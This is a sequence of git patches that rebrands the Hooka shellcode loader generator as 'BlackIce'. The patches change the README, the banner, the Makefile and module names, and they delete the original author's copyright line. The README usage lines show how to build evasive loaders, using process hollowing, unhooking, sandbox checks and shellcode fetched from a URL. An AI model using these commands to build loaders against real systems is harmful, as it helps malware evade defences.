-
- 
-
-
-
- 
-
-
-
@@ -30,7 +30,7 @@
# Introduction
-Hooka is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.
+BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.
# Features
From b7e764ae24978bb42cbc869783869b73c0031446 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 18:51:04 +0000
Subject: [PATCH 2/9] Update README.md
---
README.md | 22 +++-------------------
1 file changed, 3 insertions(+), 19 deletions(-)
diff --git a/README.md b/README.md
index dec0272..c94c7be 100644
--- a/README.md
+++ b/README.md
@@ -10,14 +10,6 @@
-
-
-
-
-
-
-
-
@@ -79,8 +71,8 @@ This tool is able to generate loaders with this features:
Just clone the repository like this:
```sh
-git clone https://github.com/D3Ext/Hooka
-cd Hooka
+git clone https://github.com/Mrdedsecurity/BlackIce-Loader.git
+cd BlackIce-Loader
make
```
@@ -90,7 +82,7 @@ After that you will find the binary under the `build/` folder
> Help panel
```
-Usage of Hooka:
+Usage of BlackIce:
REQUIRED:
-i, --input string payload to inject in raw format, as PE, as DLL or from a URL
-o, --output string name of output file (i.e. loader.exe)
@@ -167,12 +159,6 @@ $ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computer
-# TODO
-
-- ~~Check username and hostname before running~~
-- Add direct and indirect syscall
-- Add Chacha20 cypher to encrypt shellcode
-
# Library
The official Golang package has most of the already mentioned features and some others. To make use of it, see [here](https://github.com/D3Ext/Hooka/tree/main/examples) and [here](https://github.com/D3Ext/Hooka/tree/main/pkg/hooka)
@@ -213,7 +199,5 @@ Use this project under your own responsability! The author is not responsible of
This project is under [MIT](https://github.com/D3Ext/Hooka/blob/main/LICENSE) license
-Copyright © 2025, *D3Ext*
-
From 746e97eca40ad8a7f7f413a55891b7003d6e5a90 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:11:52 +0000
Subject: [PATCH 3/9] updated readme
---
README.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/README.md b/README.md
index c94c7be..3598b9d 100644
--- a/README.md
+++ b/README.md
@@ -22,8 +22,7 @@
# Introduction
-BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on other tools like [BokuLoader](https://github.com/boku7/BokuLoader), [Freeze](https://github.com/optiv/Freeze) or [Shhhloader](https://github.com/icyguider/Shhhloader), and it tries to implement more evasion features. Why in Golang? Although it's not the perfect language for malware dev, it works perfectly for testing purposes. Obviously if you want something professional and foolproof you should create your own loader in C++, C# or similars.
-
+BlackIce is able to generate shellcode loaders with multiple capabilities. It is also based on Hooka (see [here](https://github.com/D3Ext/Hooka)). This tool is intended for my own learning, please no not use the tool for malicious activity.
# Features
This tool is able to generate loaders with this features:
From 6cd3cf09532e010cb08a4cd68c821ca90b9e5b75 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:26:43 +0000
Subject: [PATCH 4/9] banner alt
---
cmd/main.go | 29 +++++++++++++++++++++--------
1 file changed, 21 insertions(+), 8 deletions(-)
diff --git a/cmd/main.go b/cmd/main.go
index d7a33d1..7042425 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -32,18 +32,31 @@ type LoaderTemplate struct {
}
// function to print the banner
-func banner(){
- fmt.Println(" _ _ _ _")
- fmt.Println(" | | | | ___ ___ | | __ __ _ | |")
- fmt.Println(" | |_| | / _ \\ / _ \\ | |/ / / _` | | |")
- fmt.Println(" | _ | | (_) | | (_) | | < | (_| | |_|")
- fmt.Println(" |_| |_| \\___/ \\___/ |_|\\_\\ \\__,_| (_)")
+func banner() {
+ fmt.Println("\033[36m") // Cyan color for ice effect
+ fmt.Println("╔═══════════════════════════════════════════════════════════════════╗")
+ fmt.Println("║ ║")
+ fmt.Println("║ ▄▄▄▄ ██▓ ▄▄▄ ▄████▄ ██ ▄█▀ ██▓ ▄████▄ ▓█████ ║")
+ fmt.Println("║ ▓█████▄ ▓██▒ ▒████▄ ▒██▀ ▀█ ██▄█▒ ▓██▒▒██▀ ▀█ ▓█ ▀ ║")
+ fmt.Println("║ ▒██▒ ▄██▒██░ ▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒██▒▒▓█ ▄ ▒███ ║")
+ fmt.Println("║ ▒██░█▀ ▒██░ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ░██░▒▓▓▄ ▄██▒▒▓█ ▄ ║")
+ fmt.Println("║ ░▓█ ▀█▓░██████▒▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░██░▒ ▓███▀ ░░▒████▒ ║")
+ fmt.Println("║ ░▒▓███▀▒░ ▒░▓ ░▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░▓ ░ ░▒ ▒ ░░░ ▒░ ░ ║")
+ fmt.Println("║ ▒░▒ ░ ░ ░ ▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ▒ ░ ░ ▒ ░ ░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ░ ░ ▒ ░ ░ ░░ ░ ▒ ░░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ║")
+ fmt.Println("║ ║")
+ fmt.Println("║ ░▒▓█ B L A C K I C E █▓▒░ ║")
+ fmt.Println("║ By MrDedSec ║")
+ fmt.Println("╚═══════════════════════════════════════════════════════════════════╝")
+ fmt.Println("\033[0m") // Reset color
}
// function to print the help panel
func help_panel(){
fmt.Println(`
-Usage of Hooka:
+Usage of BlackIce:
REQUIRED:
-i, --input string payload to inject in raw format, as PE, as DLL or from a URL
-o, --output string name of output file (i.e. loader.exe)
@@ -102,7 +115,7 @@ Examples:
// as the names may be a little bit confussing
var techniques []string = []string{"ntcreatethreadex", "ntcreatethread", "suspendedprocess", "etwpcreateetwthread", "processhollowing", "no-rwx", "nrwx", "norwx", "ntqueueapcthreadex"}
-var buffer bytes.Buffer
+var buffer bytes.Buffer
func main() {
// define variables that will hold CLI arguments values
From 8b471ab4975f90cb90d8c47c16cac58106157029 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:32:56 +0000
Subject: [PATCH 5/9] hooka -> Blackice
---
Makefile | 2 +-
cmd/main.go | 10 +++++-----
2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/Makefile b/Makefile
index 38ad2fd..8129aad 100644
--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-EXECUTABLE=hooka
+EXECUTABLE=blackice
WINDOWS=$(EXECUTABLE)_windows_amd64.exe
LINUX=$(EXECUTABLE)_linux_amd64
DARWIN=$(EXECUTABLE)_darwin_amd64
diff --git a/cmd/main.go b/cmd/main.go
index 7042425..2f615ce 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -103,10 +103,10 @@ Usage of BlackIce:
-h, --help print help panel
Examples:
- hooka -i shellcode.bin -o loader.exe
- hooka -i http://192.168.1.126/shellcode.bin -o loader.exe
- hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
- hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
+ blackice -i shellcode.bin -o loader.exe
+ blackice -i http://192.168.1.126/shellcode.bin -o loader.exe
+ blackice -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
+ blackice -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
`)
}
@@ -3247,7 +3247,7 @@ func CompileLoader(format string, output_file string, compress bool, arch string
if os.IsNotExist(err) {
// if it doesn't exist, then create it
- mod_cmd := exec.Command("go", "mod", "init", "hooka_ldr")
+ mod_cmd := exec.Command("go", "mod", "init", "blackice_ldr")
err = mod_cmd.Run()
if err != nil {
return err
From e98297693b8fe263b2f1d83462c8bc078839217d Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:35:23 +0000
Subject: [PATCH 6/9] readme commands examples to blackice. git clone link
fixed
---
README.md | 22 +++++++++++-----------
1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/README.md b/README.md
index 3598b9d..c714dbd 100644
--- a/README.md
+++ b/README.md
@@ -70,7 +70,7 @@ This tool is able to generate loaders with this features:
Just clone the repository like this:
```sh
-git clone https://github.com/Mrdedsecurity/BlackIce-Loader.git
+git clone https://github.com/Mrdedsecurity/BlackIce.git
cd BlackIce-Loader
make
```
@@ -128,28 +128,28 @@ Usage of BlackIce:
-h, --help print help panel
Examples:
- hooka -i shellcode.bin -o loader.exe
- hooka -i http://192.168.1.126/shellcode.bin -o loader.exe
- hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
- hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
+ blackice -i shellcode.bin -o loader.exe
+ blackice -i http://192.168.1.126/shellcode.bin -o loader.exe
+ blackice -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
+ blackice -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
```
> Generate a simple EXE loader
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe
```
> Generate a DLL loader
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll
+$ blackice_linux_amd64 -i shellcode.bin -o loader.dll -f dll
```
> Use custom config (various examples)
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls
-$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose
-$ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computername "DESKTOP-E1D6G0A" --compress --strings
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls
+$ blackice_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose
+$ blackice_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computername "DESKTOP-E1D6G0A" --compress --strings
```
# Demo
From 3378c415da081d82c772cadd8e5e006e8b504914 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:41:21 +0000
Subject: [PATCH 7/9] readme updated
---
README.md | 19 ++++++++++++++++---
1 file changed, 16 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index c714dbd..32165ba 100644
--- a/README.md
+++ b/README.md
@@ -1,9 +1,22 @@
-
+▄▄▄▄ ██▓ ▄▄▄ ▄████▄ ██ ▄█▀ ██▓ ▄████▄ ▓█████ +▓█████▄ ▓██▒ ▒████▄ ▒██▀ ▀█ ██▄█▒ ▓██▒▒██▀ ▀█ ▓█ ▀ +▒██▒ ▄██▒██░ ▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒██▒▒▓█ ▄ ▒███ +▒██░█▀ ▒██░ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ░██░▒▓▓▄ ▄██▒▒▓█ ▄ +░▓█ ▀█▓░██████▒▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░██░▒ ▓███▀ ░░▒████▒ +░▒▓███▀▒░ ▒░▓ ░▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░▓ ░ ░▒ ▒ ░░░ ▒░ ░ +▒░▒ ░ ░ ░ ▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ▒ ░ ░ ▒ ░ ░ ░ + ░ ░ ░ ░ ░ ▒ ░ ░ ░░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ++